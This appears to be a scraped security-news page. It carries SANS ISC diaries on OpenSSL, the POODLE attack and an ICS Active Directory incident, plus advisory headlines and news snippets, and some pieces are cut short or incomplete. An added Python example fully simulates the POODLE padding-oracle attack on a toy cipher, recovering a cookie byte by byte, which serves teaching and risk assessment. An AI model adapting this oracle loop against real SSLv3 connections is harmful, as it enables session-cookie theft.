Hi, if you have some logs from the following subnets to your infrastructure and you are able to share, could you?

  • (although I'll take /16)

If you can't share logs or packets, maybe you could send me a source IP and destination port (just use the contact form or send them directly to markh.isc (at) gmail.com).

The above are all active on SSH and DNS; I'm just trying to see if there is anything else and, if so, what and in which part of the world.



(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Info-ZIP UnZip CVE-2014-8141 Out of Bounds Read Heap Buffer Overflow Vulnerability
[SECURITY] [DSA 3121-1] file security update
Recon 2015 Call For Papers - June 19 - 21, 2015 - Montreal, Canada
[ MDVSA-2015:018 ] asterisk
[ MDVSA-2015:017 ] libevent
Info-ZIP UnZip CVE-2014-8139 Remote Heap Buffer Overflow Vulnerability
Info-ZIP UnZip CVE-2014-8140 Out of Bounds Write Heap Buffer Overflow Vulnerability

OpenSSL just released a new version of the popular SSL/TLS toolkit.

This release fixes 2 moderate and 6 low vulnerabilities. Luckily, both moderate vulnerabilities can only lead to denial of service. The other 6 low vulnerabilities are either difficult to exploit or of unknown impact, so while you should update (as always), it appears for now that there is no need to rush this upgrade.

More information is available at http://openssl.org/news/secadv_20150108.txt.


If you're running an Asus wireless router, chances are good that someone inside your network can take full administrative control of it thanks to a currently unpatched vulnerability in virtually all versions of the firmware, a security researcher said.

While the vulnerability isn't as serious as those that allow hackers on the Internet at large to compromise the devices, it's nonetheless concerning. People with administrative control can reroute everyone connected to malicious websites and possibly install alternate or even malicious firmware updates.

"I trust people that join my network to some degree, but I don't want them to be able to reconfigure the router," Joshua Drake, research director at Accuvant and the person who brought the vulnerability to light Thursday, told Ars. "I can't prevent them without this getting fixed (short of the workaround)."



On Thursday, the recent Lizard Squad tour of Internet infamy continued as the hacking group took credit for a distributed denial of service (DDoS) attack against the imageboard site 8chan. As of publication, 8chan.co is still inaccessible throughout the United States. Japanese sibling site 2ch.net, which also suffered an outage, was restored once 8chan's servers were "separated from the rest of the network," according to 8chan founder Fredrick Brennan's Twitter account.

In claiming credit for the attack, Lizard Squad pointed to its own recently launched service known as Lizard Stresser, which allows third parties to essentially hire Lizard Squad to DDoS the website of their choice. Users can pay anywhere from $6 to $500 to access the attack service, which then offers attack bursts that can last as long as 500 minutes concurrently.

Investigative reporter Brian Krebs recently profiled Lizard Squad in a story headlined Lizard Kids: A Long Trail of Fail. He said the group's Stresser service was lifted in its entirety from another more established DDoS-for-hire site. He also found Lizard Squad inadvertently exposed information about all 1,700 of its registered users.


[ MDVSA-2015:014 ] libjpeg
[ MDVSA-2015:013 ] znc
[ MDVSA-2015:012 ] jasper
[ MDVSA-2015:011 ] nail
[ MDVSA-2015:006 ] mediawiki
[ MDVSA-2015:007 ] unrtf

New research indicates cybersecurity skills shortage will be a big problem in 2015
Network World
As part of its global research project, ESG asked 591 IT and infosec professionals if their organizations planned to add headcount in 2015. It turns out that half of all organizations plan to add a significant or small number of new IT staff positions ...

LinuxSecurity.com: Updated mediawiki packages fix security vulnerabilities: In MediaWiki before 1.23.8, thumb.php outputs wikitext message as raw HTML, which could lead to cross-site scripting. Permission to edit MediaWiki namespace is required to exploit this. [More...]
LinuxSecurity.com: bsd-mailx could be made to run programs if it parsed a specially crafted email address.
LinuxSecurity.com: Exiv2 could be made to crash if it opened a specially crafted file.
LinuxSecurity.com: NSS could be made to expose sensitive information over the network.
LinuxSecurity.com: run-mailcap could be made to run programs as your login if it opened a specially crafted file.
LinuxSecurity.com: Updated glibc packages that fix two security issues and two bugs are now available for Red Hat Enterprise Linux 6. Red Hat Product Security has rated this update as having Moderate security [More...]
Cisco Jabber Guest CVE-2014-8025 Multiple Information Disclosure Vulnerabilities
Cisco Jabber Guest Server CVE-2014-8026 Multiple Cross Site Scripting Vulnerabilities
ManageEngine Desktop Central CVE-2014-7862 Remote Security Bypass Vulnerability

Information Security Analytics
Help Net Security
The point of data analytics is to provide usable business intelligence. The field of analytics is wide, and there are certain methods that work better for discovering security breaches than others. The authors concentrate on those, and on the tools ...


Posted by InfoSec News on Jan 08


Threat Level

The Obama administration has been tightlipped about its controversial
naming of the North Korean government as the definitive source of the hack
that eviscerated Sony Pictures Entertainment late last year. But FBI
director James Comey is standing by the bureau’s conclusion, and has...

Posted by InfoSec News on Jan 08


By Charlie Osborne
Zero Day
ZDNet News
January 7, 2015

Twitter has opened up suspicious activity tracker AnomalyDetection to

The social media giant said on Tuesday the tool, dubbed AnomalyDetection,
is used by the firm's team to detect unusual traffic events including
traffic spikes and surges, as well as the presence of spam bots. In the
world of...

Posted by InfoSec News on Jan 08


JAN 8, 2015

NEW YORK – The U.S. intelligence chief revealed Wednesday that during a
secret mission to Pyongyang two months ago he dined with the North Korean
general believed responsible for hacking Sony’s Hollywood studio.

Director of National Intelligence James Clapper gave a riveting account of
the visit at a New...

Posted by InfoSec News on Jan 08


By Dan Goodin
Ars Technica
Jan 7, 2015

Securing Macs against stealthy malware infections could get more
complicated thanks to a new proof-of-concept exploit that allows attackers
with brief physical access to covertly replace the firmware of most
machines built since 2011.

Once installed, the bootkit—that is, malware that replaces...

Posted by InfoSec News on Jan 08


By Gbade Ogunwale and Faith Yahaya
The Nation
Jan 7, 2015

THE Department of State Security (DSS) has alleged that the All
Progressives Congress (APC) attempted to hack into the data base of the
Independent National Electoral Commission (INEC), with the intention of
disrupting the electoral process.

DSS Spokesperson Marilyn Ogar, who briefed reporters in Abuja...

Posted by InfoSec News on Jan 08


January 07, 2015

Hasan Palaz, the former vice president of the Scientific and Technological
Research Council of Turkey (TÜBİTAK), said in comments on a Bugün TV
network program that TÜBİTAK has neither the jurisdiction nor the
necessary equipment to hack into phones protected with encryption...

One of the biggest security announcements of the last year was definitely the POODLE (Padding Oracle On Downgraded Legacy Encryption) vulnerability, which marked the real end of SSLv3. In contrast with many other previously identified weaknesses in the ciphers used by SSLv3, this vulnerability is practical: it can be exploited by an attacker without jumping over too many obstacles or requiring large resources. The POODLE vulnerability is real.

While this raised quite a bit of panic (in some cases the panic was justified), it also raised quite a bit of dust where it should not have. The goal of this diary is therefore to clear things up a bit and allow you to make a proper risk assessment of moving away from SSLv3. Please do add comments and your experiences (and any corrections, if you find errors).

A little refresher

First, though, a little refresher on how the POODLE vulnerability works. The original paper is available at https://www.openssl.org/~bodo/ssl-poodle.pdf; however, I will explain a couple of details which are, in my opinion, crucial for this attack and that maybe have not been stressed as much as they should have been in that paper (my personal opinion is that the steps of the attack should have been explained better, since that would allow people to assess the risk more easily).

The vulnerability stems from the fact that, when a CBC-mode cipher is used, the SSLv3 MAC (Message Authentication Code) does not cover the padding. Additionally (and this is the key point), when the padding is an entire block, SSLv3 checks only the last byte of that block, the padding length. All other bytes in the padding block are ignored, and the last byte must equal the block size minus one (i.e. 15 when the block size is 16 bytes).

If an attacker wants to exploit this vulnerability, he first must perform the following actions:

  • Successfully run a Man-in-the-Middle attack against the victim,
  • Downgrade the connection to SSLv3 if the client and server also support TLS (for example by tampering with the handshake until the client retries with a lower protocol version),

If the requirements above have been fulfilled, the attack itself is relatively simple; the attacker must do the following:

  • Position the byte he wants to recover as the last byte of a block. This is a critical requirement, as we will see later.
  • Copy the block that contains it over the last (padding) block of the record.

Now the attacker uses the server as an oracle, depending on the response received. The server decrypts the record and, because of CBC, the decrypted last block is XOR-ed with the ciphertext block that precedes it, which is now the block that originally preceded the padding. Since the record ends with an entire block of padding, the server accepts it only if the last byte of that result is 15. So every accepted record tells the attacker that the block cipher's output for the copied block's last byte equals 15 XOR (the last byte of the block preceding the padding), and XOR-ing that value with the last byte of the block that originally preceded the copied block gives the plaintext byte.

How does the attacker know whether the record was accepted? It's simple: by observing the server's network traffic:

  • If the check failed (the last byte was not 15), the server tears the connection down with a fatal alert, for example Alert Code 21, decryption_failed (the description says: Decryption of a TLSCiphertext record is decrypted in an invalid way: either it was not an even multiple of the block length or its padding values, when checked, were not correct. This message is always fatal.). Some implementations send bad_record_mac (Alert Code 20) instead; either way, all the attacker needs to tell apart is rejection from acceptance.
  • If the record was accepted, the attacker has recovered the byte. What the request actually does on the server does not matter.

All the attacker needs to do now is cause the victim to issue many requests. On average he will need 256 requests to decrypt a single byte (for any given byte it might take far fewer or far more). By causing the victim to issue suitably shaped requests, the attacker decrypts the data he wants (usually a session cookie in web applications) byte by byte.
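As an added worked example (not part of the original diary), the following Python simulates the mechanism above end to end: an SSLv3-style record (plaintext, MAC, padding whose only checked byte is the last one) under CBC, a server that acts as the accept/reject oracle, and an attacker who positions a secret byte at the end of a block, forces a full block of padding, copies that block over the padding block and keeps asking until the server accepts. Everything here is a stand-in and an assumption: the block cipher is a 4-round Feistel toy built from SHA-256, the MAC is HMAC-SHA1, each record gets a fresh random IV, and the key, the secret cookie and the request layout are constructed for the demo; none of it is real SSLv3 code. What it shows beyond the text is the actual bookkeeping: the recovered byte is 15 XOR the last byte of the block that now precedes the copy XOR the last byte of the block that originally preceded it, at roughly 256 attempts per byte.

```python
import hashlib
import hmac
import os

BLOCK = 16                     # block size in bytes; SSLv3 pad-length byte must then be 15
MAC_LEN = 20                   # SHA-1 MAC length
KEY = b"constructed-demo-key"  # constructed; one key for cipher and MAC, demo only
SECRET = b"sessionid=DEMO42"   # constructed sample cookie the attacker wants


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):
    # Feistel round function: keyed SHA-256 truncated to the half-block size
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BLOCK // 2]

def toy_encrypt_block(key, block):
    # 4-round Feistel network: a keyed permutation on 16-byte blocks, NOT a real cipher
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in range(4):
        l, r = r, _xor(l, _f(key, r, rnd))
    return l + r

def toy_decrypt_block(key, block):
    l, r = block[:BLOCK // 2], block[BLOCK // 2:]
    for rnd in reversed(range(4)):
        l, r = _xor(r, _f(key, l, rnd)), l
    return l + r

def cbc_encrypt(key, iv, data):
    out, prev = [], iv
    for k in range(0, len(data), BLOCK):
        prev = toy_encrypt_block(key, _xor(data[k:k + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, data):
    out, prev = [], iv
    for k in range(0, len(data), BLOCK):
        c = data[k:k + BLOCK]
        out.append(_xor(toy_decrypt_block(key, c), prev))
        prev = c
    return b"".join(out)

def sslv3_seal(key, plaintext):
    """plaintext || MAC || padding, CBC-encrypted under a fresh IV.
    SSLv3 padding bytes are arbitrary (not covered by the MAC); only the last
    byte, the pad length, matters. When plaintext+MAC ends on a block boundary
    a whole block of padding (15 junk bytes + 0x0f) is appended."""
    body = plaintext + hmac.new(key, plaintext, hashlib.sha1).digest()
    pad_len = BLOCK - 1 - len(body) % BLOCK
    body += os.urandom(pad_len) + bytes([pad_len])
    iv = os.urandom(BLOCK)
    return iv + cbc_encrypt(key, iv, body)

def sslv3_open(key, record):
    """Server side, modelled on SSLv3: read the pad length from the last byte,
    ignore the padding content, then verify the MAC. Returns the plaintext or
    None; accept/reject is the oracle the attacker observes."""
    iv, ct = record[:BLOCK], record[BLOCK:]
    if not ct or len(ct) % BLOCK:
        return None
    body = cbc_decrypt(key, iv, ct)
    pad_len = body[-1]
    if pad_len >= BLOCK:
        return None
    body = body[:-(pad_len + 1)]
    if len(body) < MAC_LEN:
        return None
    plaintext, mac = body[:-MAC_LEN], body[-MAC_LEN:]
    expected = hmac.new(key, plaintext, hashlib.sha1).digest()
    return plaintext if hmac.compare_digest(mac, expected) else None

def victim_request(key, prefix_len, suffix_len):
    """The victim (think: a browser running attacker JavaScript) sends the
    secret surrounded by attacker-chosen amounts of junk."""
    return sslv3_seal(key, b"A" * prefix_len + SECRET + b"B" * suffix_len)

def poodle_recover_byte(key, j, max_tries=50000):
    """Recover SECRET[j] using the server as a padding oracle."""
    prefix_len = (BLOCK - 1 - j) % BLOCK                        # target byte becomes last in its block
    suffix_len = -(prefix_len + len(SECRET) + MAC_LEN) % BLOCK  # plaintext+MAC fill whole blocks: full pad block
    i = (prefix_len + j) // BLOCK + 1                           # block holding the target (IV is block 0)
    for _ in range(max_tries):
        rec = victim_request(key, prefix_len, suffix_len)
        blocks = [rec[k:k + BLOCK] for k in range(0, len(rec), BLOCK)]
        n = len(blocks) - 1                                     # index of the padding block
        forged = b"".join(blocks[:n]) + blocks[i]               # C_i copied over the padding block
        if sslv3_open(key, forged) is not None:
            # accepted => D(C_i)[15] ^ C_{n-1}[15] == 15; the real plaintext byte is
            # D(C_i)[15] ^ C_{i-1}[15], so undo one XOR and apply the other
            return (BLOCK - 1) ^ blocks[n - 1][-1] ^ blocks[i - 1][-1]
    return None

def poodle_recover(key, nbytes):
    return bytes(poodle_recover_byte(key, j) for j in range(nbytes))

if __name__ == "__main__":
    print(poodle_recover(KEY, len(SECRET)))
```

Running the file prints the recovered cookie. Note what the attacker has to control to get there: prefix_len moves the target byte to the end of a block and suffix_len forces the record to end with a full block of padding. Without that influence over the request, only whatever already sits at the last byte of a block in a suitably padded record can be recovered, which is the practicality point discussed next.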

Practicality of POODLE attacks

As you can see in the previous section, there are a number of requirements that the attacker needs to fulfil to execute a POODLE attack. One of the most important is to make the victim issue many requests to the server. The attacker must also be able to influence these requests: the byte he wants to decrypt must be the last byte in a block, and the record must end with a full block of padding.
With web applications this is relatively easy: since the attacker must be in a MitM position anyway, he can make the victim's browser issue such specially shaped requests (for more details see the original paper).

However, and this is the crucial point in assessing the risk of POODLE: what happens if the attacker cannot influence such requests? Well, according to current information, he will only be able to decrypt the odd byte that already happens to sit at the end of a block in a record that happens to end with a full block of padding.

While this is still bad, the risk might be lower than with a standard web application. And this is the main point of assessing the risk: in the last couple of months I've seen simply too many cases where an auditor (or a penetration tester) ran a tool which reported that SSLv3 is enabled and blindly marked this as a critical vulnerability that has to be mitigated as soon as possible.

Typical cases of such detections are client-server applications that use SSLv3 to protect data but do not let the attacker shape the requests (for example, monitoring systems). Such systems always issue the same requests, and they do so automatically, so the attacker cannot modify the plaintext of the request as he can with web applications.

So, to wrap up this already long diary: always assess risk properly and do not accept the results of automated scanners blindly. While POODLE is indeed a severe and critical vulnerability, and we should move to TLS (v1.2 if possible), the migration should be staged and carefully planned.



Security patch management is a delicate issue in critical infrastructure. This is due to the specific configuration, operating system version and related software required by the ICS platform. Most support contracts state that any modification outside the parameters set by the manufacturer voids the contract and releases the manufacturer and seller from any responsibility for malfunctions and their consequences on the industrial process.

Unfortunately, when we talk about ICS software running on Windows, the restriction is often applied to the domain controllers as well. The case I will cover in this diary is an incident on a water ICS controlled by an Emerson Open Enterprise installation, in which all the servers in the domain had their attributes modified on the domain controller without our being able to tell what changes were executed.

Before this incident happened, all domain controllers and servers were configured to send the required security events to ArcSight. Now we need to find out which of the billions of logs we need to search: for this installation, we are talking about 3000 events per second. The incident began when the Open Enterprise HMI system began to lose readings from all the RTUs and, after a couple of minutes, was unable to send commands to any RTU.

Since we are talking here about Windows Server 2012 R2, there is an interesting repository where all event IDs for Windows 8 and Windows Server 2012 can be found. After looking through the repository, the following events are the interesting ones to search for in the ArcSight database:

Category    Subcategory                  Event ID   Message Summary
DS Access   Directory Service Changes    5136       A directory service object was modified.
DS Access   Directory Service Changes    5137       A directory service object was created.
DS Access   Directory Service Changes    5138       A directory service object was undeleted.
DS Access   Directory Service Changes    5139       A directory service object was moved.
DS Access   Directory Service Changes    5141       A directory service object was deleted.

Event ID 5136 is supposed to carry, in its Attribute field, the attribute that was changed on the specific object. Check the following evidence collected:

Log Name:      Security
Source:        Microsoft-Windows-Security-Auditing
Date:          23/11/2014 1:30:42 PM
Event ID:      5136
Task Category: Directory Service Changes
Level:         Information
Keywords:      Audit Success
User:          N/A
Computer:      DC.Domain.com
Description:
A directory service object was modified.

Subject:
  Security ID:    Domain\Administrator
  Account Name:   Administrator
  Account Domain: Domain
  Logon ID:       0x5f8a3
Directory Service:
  Name: Domain.local
  Type: Active Directory Domain Services
Object:
  DN:    CN=XXXXXXX,OU=XXXXX,DC=Domain,DC=Com
  GUID:  CN=XXXXX,OU=XXXXX,DC=Domain,DC=Com
  Class: XXXXX
Attribute:
  XXXXXXXXXXX:  YYYYYYYY
  Syntax (OID): X.X.X.X
  Value:        ZZZZZZZZZZZZZZ
Operation:
  Type:           Value Deleted
  Correlation ID: {ba5fa2fe-9a61-12fa-1b95-3bf03643b4e2}

For some reason, the attribute field was missing and we could not know what attributes were deleted. After researching this issue, we found it

Want to implement patch management in your organization? Check the specific NIST guide for more information.
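As an added example (not from the diary), here is a small Python parser for the 5136 event layout shown above. It turns each event's "Section / Key: Value" text into a record, joins the "Value Deleted" and "Value Added" events that share a Correlation ID into one before/after change, and flags changes whose attribute name is blank, which is exactly the situation described above: you know an object changed but not which attribute. The three sample events are constructed for this example (the example.com domain, the SRV01 computer object and the servicePrincipalName values are made up); the section and field names are the ones Windows uses in a 5136 event.

```python
from collections import defaultdict

# Section headers that appear in a 5136 description. "Type:" occurs under both
# "Directory Service" and "Operation", so fields are keyed as "Section.Field".
SECTIONS = {"Subject", "Directory Service", "Object", "Attribute", "Operation"}

CORR_A = "{11111111-1111-1111-1111-111111111111}"   # constructed
CORR_B = "{22222222-2222-2222-2222-222222222222}"   # constructed


def _sample_5136(op_type, corr, attr, value):
    """Constructed 5136 event text in the layout Windows uses (see the evidence above)."""
    return f"""Log Name: Security
Source: Microsoft-Windows-Security-Auditing
Event ID: 5136
Task Category: Directory Service Changes
Computer: DC.example.com
Subject:
  Security ID: EXAMPLE\\Administrator
  Account Name: Administrator
  Account Domain: EXAMPLE
  Logon ID: 0x5f8a3
Directory Service:
  Name: example.com
  Type: Active Directory Domain Services
Object:
  DN: CN=SRV01,OU=Servers,DC=example,DC=com
  GUID: {{0d3f4c2a-5e1b-4f0e-9a7c-000000000001}}
  Class: computer
Attribute:
  LDAP Display Name: {attr}
  Syntax (OID): 2.5.5.12
  Value: {value}
Operation:
  Type: {op_type}
  Correlation ID: {corr}
"""


# A modify-replace of one value is logged as two events sharing a Correlation ID;
# the third event reproduces the diary's problem: the attribute name is blank.
SAMPLE_EVENTS = [
    _sample_5136("Value Deleted", CORR_A, "servicePrincipalName", "HOST/SRV01"),
    _sample_5136("Value Added", CORR_A, "servicePrincipalName", "HOST/SRV01.example.com"),
    _sample_5136("Value Deleted", CORR_B, "", ""),
]


def parse_5136(text):
    """Flatten one event's 'Key: Value' lines into a dict keyed 'Section.Key'
    (top-level header lines such as 'Event ID' keep their bare key)."""
    rec, section = {}, None
    for raw in text.splitlines():
        key, sep, value = raw.strip().partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key in SECTIONS and value == "":
            section = key                      # "Object:" etc. open a new section
            continue
        rec[f"{section}.{key}" if section else key] = value
    return rec


def reconstruct_changes(events):
    """Join Value Deleted / Value Added pairs by Correlation ID into before/after records."""
    changes = defaultdict(dict)
    for text in events:
        rec = parse_5136(text)
        if rec.get("Event ID") != "5136":
            continue
        entry = changes[rec["Operation.Correlation ID"]]
        entry.setdefault("subject", rec.get("Subject.Account Name", ""))
        entry.setdefault("dn", rec.get("Object.DN", ""))
        entry.setdefault("attribute", rec.get("Attribute.LDAP Display Name", ""))
        if rec["Operation.Type"] == "Value Deleted":
            entry["old"] = rec.get("Attribute.Value", "")
        elif rec["Operation.Type"] == "Value Added":
            entry["new"] = rec.get("Attribute.Value", "")
    return dict(changes)


def incomplete_changes(changes):
    """Changes that say an object was modified but not which attribute: the
    situation in the diary, where the Attribute field came back empty."""
    return {corr: c for corr, c in changes.items() if not c["attribute"]}


if __name__ == "__main__":
    found = reconstruct_changes(SAMPLE_EVENTS)
    for corr, c in found.items():
        print(corr, c["dn"], c["attribute"] or "<missing attribute>",
              c.get("old", "<none>"), "->", c.get("new", "<none>"))
    print("incomplete:", list(incomplete_changes(found)))
```

In practice you would feed this the event text exported from ArcSight (or from the Security log) instead of SAMPLE_EVENTS; the correlation step is what turns thousands of individual 5136 lines into a readable list of what changed on which object, and the incomplete_changes list is the set you still cannot explain from the logs alone.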

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
e-mail: msantand at isc dot sans dot org
